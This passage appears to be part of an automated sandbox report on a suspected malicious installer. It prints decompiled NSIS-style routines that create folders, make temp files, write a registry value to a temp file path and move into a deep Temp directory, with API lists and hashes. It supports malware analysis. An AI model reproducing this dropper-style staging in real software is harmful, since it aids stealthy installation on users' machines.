MulDiv.KERNEL32(7FFFFFFF,00000064,00000000), ref: 00403211
wsprintfW.USER32 ref: 00403224

Strings

... %d%%, xrefs: 0040321E

Memory Dump Source

Source File: 00000006.00000002.45132331372.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.45132294401.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132406736.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.000000000077C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.0000000000782000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.0000000000786000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.0000000000789000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.00000000007A4000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.00000000007A6000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.00000000007AB000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.00000000007B3000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.00000000007C6000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.00000000007D8000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45135016541.00000000007DA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_hi38VYWujz.jbxd

Similarity

API ID: CountTick$wsprintf
String ID: ... %d%%
API String ID: 551687249-2449383134
Opcode ID: 5d95faed883021d29135786fab1021639b0595a9b4acb09984627cea9783b19b
Instruction ID: 4304c27296c3acdf0d2a87061290089073c1970791b1d07264e817265a7bbb17
Opcode Fuzzy Hash: 5d95faed883021d29135786fab1021639b0595a9b4acb09984627cea9783b19b
Instruction Fuzzy Hash: 3C516C31801219EBCB10DF65DA45A9F7BA8AF45766F1442BFE810B72C0C7788F51CBA9

Uniqueness

Uniqueness Score: -1.00%

Function 00405792 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 39
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E00405792(WCHAR* _a4) {
				struct _SECURITY_ATTRIBUTES _v16;
				struct _SECURITY_DESCRIPTOR _v36;
				int _t22;
				long _t23;

				_v36.Sbz1 = _v36.Sbz1 & 0x00000000;
				_v36.Owner = 0x4083f0;
				_v36.Group = 0x4083f0;
				_v36.Sacl = _v36.Sacl & 0x00000000;
				_v16.bInheritHandle = _v16.bInheritHandle & 0x00000000;
				_v16.lpSecurityDescriptor =  &_v36;
				_v36.Revision = 1;
				_v36.Control = 4;
				_v36.Dacl = 0x4083e0;
				_v16.nLength = 0xc;
				_t22 = CreateDirectoryW(_a4,  &_v16); // executed
				if(_t22 != 0) {
					L1:
					return 0;
				}
				_t23 = GetLastError();
				if(_t23 == 0xb7) {
					if(SetFileSecurityW(_a4, 0x80000007,  &_v36) != 0) {
						goto L1;
					}
					return GetLastError();
				}
				return _t23;
			}

0x0040579d
0x004057a1
0x004057a4
0x004057aa
0x004057ae
0x004057b2
0x004057ba
0x004057c1
0x004057c7
0x004057ce
0x004057d5
0x004057dd
0x004057df
0x00000000
0x004057df
0x004057e9
0x004057f0
0x00405806
0x00000000
0x00000000
0x00000000
0x00405808
0x0040580c

APIs

CreateDirectoryW.KERNELBASE(?,?,00000000), ref: 004057D5
GetLastError.KERNEL32 ref: 004057E9
SetFileSecurityW.ADVAPI32(?,80000007,00000001), ref: 004057FE
GetLastError.KERNEL32 ref: 00405808

Strings

C:\Users\user\Desktop, xrefs: 00405792

Memory Dump Source

Source File: 00000006.00000002.45132331372.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.45132294401.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132406736.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.000000000077C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.0000000000782000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.0000000000786000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.0000000000789000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.00000000007A4000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.00000000007A6000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.00000000007AB000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.00000000007B3000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.00000000007C6000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.00000000007D8000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45135016541.00000000007DA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_hi38VYWujz.jbxd

Similarity

API ID: ErrorLast$CreateDirectoryFileSecurity
String ID: C:\Users\user\Desktop
API String ID: 3449924974-3370423016
Opcode ID: c7775b55854fc79259119bfc4daa9494171cd7cf58f96f816c013ac7f64a11dc
Instruction ID: 488e367ac99084f0472557c0a26963b348c4b9c4a011ef6404f7c6369f031e52
Opcode Fuzzy Hash: c7775b55854fc79259119bfc4daa9494171cd7cf58f96f816c013ac7f64a11dc
Instruction Fuzzy Hash: 03011A71C00619DADF009FA1C9447EFBBB4EF14354F00803AD945B6281D7789618CFE9

Uniqueness

Uniqueness Score: -1.00%

Function 00405D80 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 37
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E00405D80(void* __ecx, WCHAR* _a4, WCHAR* _a8) {
				intOrPtr _v8;
				short _v12;
				short _t12;
				intOrPtr _t13;
				signed int _t14;
				WCHAR* _t17;
				signed int _t19;
				signed short _t23;
				WCHAR* _t26;

				_t26 = _a4;
				_t23 = 0x64;
				while(1) {
					_t12 =  *L"nsa"; // 0x73006e
					_t23 = _t23 - 1;
					_v12 = _t12;
					_t13 =  *0x40a55c; // 0x61
					_v8 = _t13;
					_t14 = GetTickCount();
					_t19 = 0x1a;
					_v8 = _v8 + _t14 % _t19;
					_t17 = GetTempFileNameW(_a8,  &_v12, 0, _t26); // executed
					if(_t17 != 0) {
						break;
					}
					if(_t23 != 0) {
						continue;
					} else {
						 *_t26 =  *_t26 & _t23;
					}
					L4:
					return _t17;
				}
				_t17 = _t26;
				goto L4;
			}

0x00405d86
0x00405d8c
0x00405d8d
0x00405d8d
0x00405d92
0x00405d93
0x00405d96
0x00405d9b
0x00405d9e
0x00405da8
0x00405db5
0x00405db9
0x00405dc1
0x00000000
0x00000000
0x00405dc5
0x00000000
0x00405dc7
0x00405dc7
0x00405dc7
0x00405dca
0x00405dcd
0x00405dcd
0x00405dd0
0x00000000

APIs

GetTickCount.KERNEL32 ref: 00405D9E
GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,"C:\Users\user\Desktop\hi38VYWujz.exe",0040334E,1033,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,75ED3420,0040359C), ref: 00405DB9

Strings

"C:\Users\user\Desktop\hi38VYWujz.exe", xrefs: 00405D80
C:\Users\user\AppData\Local\Temp\, xrefs: 00405D85, 00405D89
nsa, xrefs: 00405D8D

Memory Dump Source

Source File: 00000006.00000002.45132331372.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.45132294401.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132406736.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.000000000077C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.0000000000782000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.0000000000786000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.0000000000789000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.00000000007A4000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.00000000007A6000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.00000000007AB000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.00000000007B3000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.00000000007C6000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.00000000007D8000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45135016541.00000000007DA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_hi38VYWujz.jbxd

Similarity

API ID: CountFileNameTempTick
String ID: "C:\Users\user\Desktop\hi38VYWujz.exe"$C:\Users\user\AppData\Local\Temp\$nsa
API String ID: 1716503409-3029410417
Opcode ID: 579317ece081e1c49d3b274132234632dc0f80c8b4471fc5797a0d742f25062f
Instruction ID: 49388a817ab8929663d32c184486222aab3b5007cea287540e7d96a1fedb5290
Opcode Fuzzy Hash: 579317ece081e1c49d3b274132234632dc0f80c8b4471fc5797a0d742f25062f
Instruction Fuzzy Hash: 56F01D76600304FBEB009F69DD09E9BBBA9EF95750F11807BE900A6290E6B099548B64

Uniqueness

Uniqueness Score: -1.00%

Function 10001759 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 118
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 92%

			E10001759(void* __edx, void* __edi, void* __esi, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
				void _v36;
				struct HINSTANCE__* _t34;
				intOrPtr _t38;
				void* _t44;
				void* _t45;
				void* _t46;
				void* _t50;
				intOrPtr _t53;
				signed int _t57;
				signed int _t61;
				void* _t65;
				void* _t66;
				void* _t70;
				void* _t74;

				_t74 = __esi;
				_t66 = __edi;
				_t65 = __edx;
				 *0x1000406c = _a8;
				 *0x10004070 = _a16;
				 *0x10004074 = _a12;
				 *((intOrPtr*)(_a20 + 0xc))( *0x10004048, E100015B1);
				_push("true"); // executed
				_t34 = E10001B18(); // executed
				_t50 = _t34;
				if(_t50 == 0) {
					L28:
					return _t34;
				} else {
					if( *((intOrPtr*)(_t50 + 4)) != 1) {
						E10002286(_t50);
					}
					_push(_t50);
					E100022D0(_t65);
					_t53 =  *((intOrPtr*)(_t50 + 4));
					if(_t53 == 0xffffffff) {
						L14:
						if(( *(_t50 + 0x1010) & 0x00000004) == 0) {
							if( *((intOrPtr*)(_t50 + 4)) == 0) {
								_t34 = E100024A4(_t50);
							} else {
								_push(_t74);
								_push(_t66);
								_t12 = _t50 + 0x1018; // 0x1018
								_t57 = 8;
								memcpy( &_v36, _t12, _t57 << 2);
								_t38 = E100015B4(_t50);
								_t15 = _t50 + 0x1018; // 0x1018
								_t70 = _t15;
								 *((intOrPtr*)(_t50 + 0x1020)) = _t38;
								 *_t70 = 4;
								E100024A4(_t50);
								_t61 = 8;
								_t34 = memcpy(_t70,  &_v36, _t61 << 2);
							}
						} else {
							E100024A4(_t50);
							_t34 = GlobalFree(E10001272(E100015B4(_t50)));
						}
						if( *((intOrPtr*)(_t50 + 4)) != 1) {
							_t34 = E10002467(_t50);
							if(( *(_t50 + 0x1010) & 0x00000040) != 0 &&  *_t50 == 1) {
								_t34 =  *(_t50 + 0x1008);
								if(_t34 != 0) {
									_t34 = FreeLibrary(_t34);
								}
							}
							if(( *(_t50 + 0x1010) & 0x00000020) != 0) {
								_t34 = E1000153D( *0x10004068);
							}
						}
						if(( *(_t50 + 0x1010) & 0x00000002) != 0) {
							goto L28;
						} else {
							return GlobalFree(_t50);
						}
					}
					_t44 =  *_t50;
					if(_t44 == 0) {
						if(_t53 != 1) {
							goto L14;
						}
						E10002B57(_t50);
						L12:
						_t50 = _t44;
						L13:
						goto L14;
					}
					_t45 = _t44 - 1;
					if(_t45 == 0) {
						L8:
						_t44 = E1000289C(_t53, _t50); // executed
						goto L12;
					}
					_t46 = _t45 - 1;
					if(_t46 == 0) {
						E10002640(_t50);
						goto L13;
					}
					if(_t46 != 1) {
						goto L14;
					}
					goto L8;
				}
			}

0x10001759
0x10001759
0x10001759
0x10001763
0x1000176b
0x10001778
0x10001786
0x10001789
0x1000178b
0x10001790
0x10001795
0x100018a8
0x100018a8
0x1000179b
0x1000179f
0x100017a2
0x100017a7
0x100017a8
0x100017a9
0x100017af
0x100017b5
0x100017e5
0x100017ec
0x10001810
0x1000184f
0x10001812
0x10001812
0x10001813
0x10001816
0x1000181c
0x10001820
0x10001823
0x10001828
0x10001828
0x1000182f
0x10001835
0x1000183b
0x10001847
0x10001848
0x1000184b
0x100017ee
0x100017ef
0x10001804
0x10001804
0x10001859
0x1000185c
0x10001869
0x10001870
0x10001878
0x1000187b
0x1000187b
0x10001878
0x10001888
0x10001890
0x10001895
0x10001888
0x1000189d
0x00000000
0x1000189f
0x00000000
0x100018a0
0x1000189d
0x100017b9
0x100017bc
0x100017da
0x00000000
0x00000000
0x100017dd
0x100017e2
0x100017e2
0x100017e4
0x00000000
0x100017e4
0x100017be
0x100017bf
0x100017c7
0x100017c8
0x00000000
0x100017c8
0x100017c1
0x100017c2
0x100017d0
0x00000000
0x100017d0
0x100017c5
0x00000000
0x00000000
0x00000000
0x100017c5

APIs

Part of subcall function 10001B18: GlobalFree.KERNEL32(?), ref: 10001D83
Part of subcall function 10001B18: GlobalFree.KERNEL32(?), ref: 10001D88
Part of subcall function 10001B18: GlobalFree.KERNEL32(?), ref: 10001D8D

GlobalFree.KERNEL32(00000000), ref: 10001804
FreeLibrary.KERNEL32(?), ref: 1000187B
GlobalFree.KERNEL32(00000000), ref: 100018A0

Part of subcall function 10002286: GlobalAlloc.KERNEL32(00000040,8BC3C95B), ref: 100022B8

Part of subcall function 10002640: GlobalAlloc.KERNEL32(00000040,?,?,?,00000000,?,?,?,?,100017D5,00000000), ref: 100026B2

Part of subcall function 100015B4: lstrcpyW.KERNEL32(00000000,10004020), ref: 100015CD

Strings

, xrefs: 10001881

Memory Dump Source

Source File: 00000006.00000002.45232552637.0000000010001000.00000020.00000001.01000000.00000006.sdmp, Offset: 10000000, based on PE: true

Associated: 00000006.00000002.45232522122.0000000010000000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.45232596193.0000000010003000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.45232631278.0000000010005000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_10000000_hi38VYWujz.jbxd

Similarity

API ID: Global$Free$Alloc$Librarylstrcpy
String ID:
API String ID: 1791698881-3916222277
Opcode ID: 80a71440bbdc6676df6433b68331a89e098fd0a61e7fd3645cfd834030fcbe9d
Instruction ID: 65685ba44f5e0dd4e22f20931bb662b0f8110762eb821eef9687284fed8b6370
Opcode Fuzzy Hash: 80a71440bbdc6676df6433b68331a89e098fd0a61e7fd3645cfd834030fcbe9d
Instruction Fuzzy Hash: 4A31AC75804241AAFB14DF649CC9BDA37E8FF043D4F158065FA0AAA08FDFB4A984C761

Uniqueness

Uniqueness Score: -1.00%

Function 004023DE Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 64
registrystringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 83%

			E004023DE(void* __eax, int __ebx, intOrPtr __edx) {
				void* _t20;
				void* _t21;
				int _t24;
				long _t25;
				int _t30;
				intOrPtr _t33;
				void* _t34;
				intOrPtr _t37;
				void* _t39;
				void* _t42;

				_t33 = __edx;
				_t30 = __ebx;
				_t37 =  *((intOrPtr*)(_t39 - 0x18));
				_t34 = __eax;
				 *(_t39 - 0x4c) =  *(_t39 - 0x14);
				 *(_t39 - 0x3c) = E00402C37(2);
				_t20 = E00402C37(0x11);
				 *(_t39 - 4) = 1;
				_t21 = E00402CC7(_t42, _t34, _t20, 2); // executed
				 *(_t39 + 8) = _t21;
				if(_t21 != __ebx) {
					_t24 = 0;
					if(_t37 == 1) {
						E00402C37(0x23);
						_t24 = lstrlenW(0x40b5a8) + _t29 + 2;
					}
					if(_t37 == 4) {
						 *0x40b5a8 = E00402C15(3);
						 *((intOrPtr*)(_t39 - 0x30)) = _t33;
						_t24 = _t37;
					}
					if(_t37 == 3) {
						_t24 = E004030FA( *((intOrPtr*)(_t39 - 0x1c)), _t30, 0x40b5a8, 0x1800);
					}
					_t25 = RegSetValueExW( *(_t39 + 8),  *(_t39 - 0x3c), _t30,  *(_t39 - 0x4c), 0x40b5a8, _t24); // executed
					if(_t25 == 0) {
						 *(_t39 - 4) = _t30;
					}
					_push( *(_t39 + 8));
					RegCloseKey(); // executed
				}
				 *0x7a8ac8 =  *0x7a8ac8 +  *(_t39 - 4);
				return 0;
			}

0x004023de
0x004023de
0x004023de
0x004023e1
0x004023e8
0x004023f2
0x004023f5
0x004023fe
0x00402405
0x0040240c
0x0040240f
0x00402415
0x0040241f
0x00402423
0x0040242e
0x0040242e
0x00402435
0x0040243f
0x00402445
0x00402448
0x00402448
0x0040244c
0x00402458
0x00402458
0x00402469
0x00402471
0x00402473
0x00402473
0x00402476
0x00402551
0x00402551
0x00402ac2
0x00402ace

APIs

lstrlenW.KERNEL32(C:\Users\user\AppData\Local\Temp\nscDB19.tmp,00000023,?,00000000,00000002,00000011,00000002), ref: 00402429
RegSetValueExW.KERNELBASE(?,?,?,?,C:\Users\user\AppData\Local\Temp\nscDB19.tmp,00000000,?,00000000,00000002,00000011,00000002), ref: 00402469
RegCloseKey.KERNELBASE(?,?,?,C:\Users\user\AppData\Local\Temp\nscDB19.tmp,00000000,?,00000000,00000002,00000011,00000002), ref: 00402551

Strings

C:\Users\user\AppData\Local\Temp\nscDB19.tmp, xrefs: 0040241A, 0040243F, 00402453, 0040245E

Memory Dump Source

Source File: 00000006.00000002.45132331372.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.45132294401.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132406736.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.000000000077C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.0000000000782000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.0000000000786000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.0000000000789000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.00000000007A4000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.00000000007A6000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.00000000007AB000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.00000000007B3000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.00000000007C6000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.00000000007D8000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45135016541.00000000007DA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_hi38VYWujz.jbxd

Similarity

API ID: CloseValuelstrlen
String ID: C:\Users\user\AppData\Local\Temp\nscDB19.tmp
API String ID: 2655323295-41561862
Opcode ID: da5dd1646f1b3941156e64929c72752a0b3671e5fd854432c304d9b0703b255a
Instruction ID: 065199c4180da03f85bcad36feea8d83242cacde3b0560515a804f641c4ac6e3
Opcode Fuzzy Hash: da5dd1646f1b3941156e64929c72752a0b3671e5fd854432c304d9b0703b255a
Instruction Fuzzy Hash: 21119371E00108BEEB10AFA5DE49EAEBAB4EB54354F11803BF504F71D1DBB84D419B58

Uniqueness

Uniqueness Score: -1.00%

Function 004015C1 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 65
COMMON

Download Yara Rule

C-Code - Quality: 86%

			E004015C1(short __ebx, void* __eflags) {
				void* _t17;
				int _t23;
				void* _t25;
				signed char _t26;
				short _t28;
				short _t31;
				short* _t34;
				void* _t36;

				_t28 = __ebx;
				 *(_t36 + 8) = E00402C37(0xfffffff0);
				_t17 = E00405BDB(_t16);
				_t32 = _t17;
				if(_t17 != __ebx) {
					do {
						_t34 = E00405B5D(_t32, 0x5c);
						_t31 =  *_t34;
						 *_t34 = _t28;
						if(_t31 != _t28) {
							L5:
							_t25 = E0040580F( *(_t36 + 8));
						} else {
							_t42 =  *((intOrPtr*)(_t36 - 0x20)) - _t28;
							if( *((intOrPtr*)(_t36 - 0x20)) == _t28 || E0040582C(_t42) == 0) {
								goto L5;
							} else {
								_t25 = E00405792( *(_t36 + 8)); // executed
							}
						}
						if(_t25 != _t28) {
							if(_t25 != 0xb7) {
								L9:
								 *((intOrPtr*)(_t36 - 4)) =  *((intOrPtr*)(_t36 - 4)) + 1;
							} else {
								_t26 = GetFileAttributesW( *(_t36 + 8)); // executed
								if((_t26 & 0x00000010) == 0) {
									goto L9;
								}
							}
						}
						 *_t34 = _t31;
						_t32 = _t34 + 2;
					} while (_t31 != _t28);
				}
				if( *((intOrPtr*)(_t36 - 0x24)) == _t28) {
					_push(0xfffffff5);
					E00401423();
				} else {
					E00401423(0xffffffe6);
					E0040625F(L"C:\\Users\\Arthur\\AppData\\Local\\Temp\\Cascara\\Personers\\Narra\\Freons\\Entrenching\\Samsen",  *(_t36 + 8));
					_t23 = SetCurrentDirectoryW( *(_t36 + 8)); // executed
					if(_t23 == 0) {
						 *((intOrPtr*)(_t36 - 4)) =  *((intOrPtr*)(_t36 - 4)) + 1;
					}
				}
				 *0x7a8ac8 =  *0x7a8ac8 +  *((intOrPtr*)(_t36 - 4));
				return 0;
			}

0x004015c1
0x004015c9
0x004015cc
0x004015d1
0x004015d5
0x004015d7
0x004015df
0x004015e1
0x004015e4
0x004015ea
0x00401604
0x00401607
0x004015ec
0x004015ec
0x004015ef
0x00000000
0x004015fa
0x004015fd
0x004015fd
0x004015ef
0x0040160e
0x00401615
0x00401624
0x00401624
0x00401617
0x0040161a
0x00401622
0x00000000
0x00000000
0x00401622
0x00401615
0x00401627
0x0040162b
0x0040162c
0x004015d7
0x00401634
0x00401663
0x00402245
0x00401636
0x00401638
0x00401645
0x0040164d
0x00401655
0x0040165b
0x0040165b
0x00401655
0x00402ac2
0x00402ace

APIs

Part of subcall function 00405BDB: CharNextW.USER32(?,?,Scienza\Pulmobranchiate.Rid207,?,00405C4F,Scienza\Pulmobranchiate.Rid207,Scienza\Pulmobranchiate.Rid207,?,?,75ED3420,0040598D,?,C:\Users\user\AppData\Local\Temp\,75ED3420,00000000), ref: 00405BE9
Part of subcall function 00405BDB: CharNextW.USER32(00000000), ref: 00405BEE
Part of subcall function 00405BDB: CharNextW.USER32(00000000), ref: 00405C06

GetFileAttributesW.KERNELBASE(?,?,00000000,0000005C,00000000,000000F0), ref: 0040161A

Part of subcall function 00405792: CreateDirectoryW.KERNELBASE(?,?,00000000), ref: 004057D5

SetCurrentDirectoryW.KERNELBASE(?,C:\Users\user\AppData\Local\Temp\Cascara\Personers\Narra\Freons\Entrenching\Samsen,?,00000000,000000F0), ref: 0040164D

Strings

C:\Users\user\AppData\Local\Temp\Cascara\Personers\Narra\Freons\Entrenching\Samsen, xrefs: 00401640

Memory Dump Source

Source File: 00000006.00000002.45132331372.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.45132294401.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132406736.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.000000000077C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.0000000000782000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.0000000000786000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.0000000000789000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.00000000007A4000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.00000000007A6000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.00000000007AB000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.00000000007B3000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.00000000007C6000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.00000000007D8000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45135016541.00000000007DA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_hi38VYWujz.jbxd

Similarity

API ID: CharNext$Directory$AttributesCreateCurrentFile
String ID: C:\Users\user\AppData\Local\Temp\Cascara\Personers\Narra\Freons\Entrenching\Samsen
API String ID: 1892508949-905226469
Opcode ID: cfaf144a50c9d872fad7681be613026781b9e36b6b2873b11358c1c1ca949dd0
Instruction ID: a664f1efeb726e69a6ab8af553608a028f51c0b4cf1c5e7724f5d8b0eae84205
Opcode Fuzzy Hash: cfaf144a50c9d872fad7681be613026781b9e36b6b2873b11358c1c1ca949dd0
Instruction Fuzzy Hash: 9311BE31504504EBCF317FA0CD4159F36A0EF15368B28493BEA45B22F2DB3E4D519A5E

Uniqueness

Uniqueness Score: -1.00%

Function 00405237 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46
windowCOMMON

Download Yara Rule

C-Code - Quality: 89%

			E00405237(struct HWND__* _a4, int _a8, int _a12, long _a16) {
				long _t9;
				int _t15;
				long _t16;

				_t15 = _a8;
				if(_t15 != 0x102) {
					if(_t15 != 0x200) {
						_t16 = _a16;
						L7:
						if(_t15 == 0x419 &&  *0x7a1f0c != _t16) {
							_push(_t16);
							_push(6);
							 *0x7a1f0c = _t16;
							E00404C0D();
						}
						L11:
						_t9 = CallWindowProcW( *0x7a1f14, _a4, _t15, _a12, _t16); // executed
						return _t9;
					}
					if(IsWindowVisible(_a4) == 0) {
						L10:
						_t16 = _a16;
						goto L11;
					}
					_t16 = E00404B8D(_a4, "true");
					_t15 = 0x419;
					goto L7;
				}
				if(_a12 != 0x20) {
					goto L10;
				}
				E00404240(0x413);
				return 0;
			}

0x0040523b
0x00405245
0x00405261
0x00405283
0x00405286
0x0040528c
0x00405296
0x00405297
0x00405299
0x0040529f
0x0040529f
0x004052a9
0x004052b7
0x00000000
0x004052b7
0x0040526e
0x004052a6
0x004052a6
0x00000000
0x004052a6
0x0040527a
0x0040527c
0x00000000
0x0040527c
0x0040524b
0x00000000
0x00000000
0x00405252
0x00000000

APIs

IsWindowVisible.USER32(?), ref: 00405266
CallWindowProcW.USER32(?,?,?,?), ref: 004052B7

Part of subcall function 00404240: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 00404252

Strings

, xrefs: 00405247

Memory Dump Source

Source File: 00000006.00000002.45132331372.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.45132294401.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132406736.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.000000000077C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.0000000000782000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.0000000000786000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.0000000000789000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.00000000007A4000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.00000000007A6000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.00000000007AB000.00000004.00000001.01000000.00000004.sdmpDownload File
